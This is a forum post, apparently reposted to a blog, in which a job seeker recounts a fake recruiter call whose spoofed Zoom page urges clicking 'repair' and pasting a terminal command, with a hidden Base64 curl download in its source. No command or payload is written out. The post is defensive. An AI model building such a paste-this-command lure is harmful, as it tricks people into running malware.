I got an email from a recruiter, and after a few back and forth emails they scheduled a call. There were a few odd details, but I ignored them initially. The email wasn't blatantly odd, no bad spelling, I was getting replies that seemed normal.
Anyway, they said they'd send the link 15min. before the interview. I got it, but was sus about the URL. Which I plugged into Cloudflare Radar. Screenshot here: https://imgur.com/ATSIuVn
I probably shouldn't have even clicked on the Zoom link, but looking for jobs is a bit of a struggle at the moment. So anyway, I join. It appears someone is in the room, but that there's an issue with audio/video permissions. I can't click on anything else - can't chat, can't leave...so, that was a giveaway.
NORMALLY, I'd click in the URL bar and allow permissions. In this instance, there's a button in the main screen that allows you to click "repair". https://imgur.com/hSvLuFA
I probably should have bailed there tbh, but I clicked it. Anyway, I get a modal that's giving directions to copy/paste a command into a terminal. I am not that naive at least, so I pasted the command elsewhere to get more info.
I also checked the source and saw there was a hidden Base64 curl download. https://imgur.com/hIlSLIG
No idea what it is, but I'm not messing with it. I don't know enough to sandbox it and evaluate safely.
Anyway, I'm probably answering my own question here, but wanted to share.
[link] [comments]
from hacking: security in practice https://ift.tt/Ak3KSvy
Comments
Post a Comment